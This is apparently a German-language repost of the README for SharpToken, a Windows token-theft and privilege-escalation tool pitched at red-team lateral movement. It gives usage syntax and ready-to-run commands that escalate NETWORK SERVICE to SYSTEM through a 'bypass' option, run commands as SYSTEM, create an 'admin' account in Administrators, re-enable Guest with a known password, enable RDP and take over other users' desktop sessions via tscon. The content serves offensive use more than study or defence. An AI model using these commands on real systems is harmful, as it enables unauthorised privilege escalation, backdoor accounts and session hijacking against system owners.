
Windows-Token-Diebstahl und Privilegienausweitung-Tool, das durchgesickerte Token von Prozessen stiehlt, SYSTEM-Level-Zugriff, Benutzerimitation und Desktop-Wechsel ohne Passwörter ermöglicht.
Während der Lateral Movement bei Red Teams müssen wir oft die Berechtigungen anderer Benutzer stehlen. Unter dem Schutz moderner EDR ist es schwierig, Mimikatz zu verwenden, um andere Benutzerberechtigungen zu erlangen. Wenn der Zielbenutzer keinen aktiven Prozess hat, können wir auch nicht "OpenProcessToken" nutzen, um ein Token zu stehlen.
SharpToken ist ein Tool zur Ausnutzung von Token-Leaks. Es kann durchgesickerte Tokens aus allen Prozessen im System finden und verwenden. Wenn Sie ein Benutzer mit niedrigen Dienstberechtigungen sind, können Sie es sogar nutzen, um auf "NT AUTHORITY\SYSTEM"-Berechtigungen zu upgraden, und Sie können auf den Desktop des Zielbenutzers wechseln, um mehr zu tun, ohne das Passwort des Zielbenutzers zu kennen. ..

SharpToken By BeichenDream
=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
Usage:
SharpToken COMMAND arguments
COMMANDS:
list_token [process pid] [bypass]
list_all_token [process pid] [bypass]
add_user <username> <password> [group] [domain] [bypass]
enableUser <username> <NewPassword> [NewGroup] [bypass]
delete_user <username> [domain] [bypass]
execute <tokenUser> <commandLine> [Interactive] [bypass]
enableRDP [bypass]
tscon <targetSessionId> [sourceSessionId] [bypass]
example:
SharpToken list_token
SharpToken list_token bypass
SharpToken list_token 6543
SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
SharpToken tscon 1
Neben der üblichen Token-Diebstahl-Berechtigungserhöhung unterstützt SharpToken auch das Erlangen von Tokens mit Integrität durch Bypass.
Wenn Sie ein NT AUTHORITY/NETWORK SERVICE-Benutzer sind und den Bypass-Parameter hinzufügen, stiehlt SharpToken das System von RPCSS, also eine bedingungslose NT AUTHORITY\NETWORK SERVICE zu NT AUTHORITY\SYSTEM.

Die aufgelisteten Informationen umfassen SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (Handle des Tokens nach Duplizierung), TargetProcessId (Prozess, aus dem das Token stammt), TargetProcessToken (Handle des Tokens im Quellprozess), Groups (Gruppe, in der sich der Token-Benutzer befindet).
SharpToken list_token

SharpToken list_token 468

execute "NT AUTHORITY\SYSTEM" cmd true

SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
Wobei 1 der Desktop des Zielbenutzers und 2 der Desktop ist, den wir empfangen möchten.
SharpToken tscon 1 2
https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
https://github.com/decoder-it/NetworkServiceExploit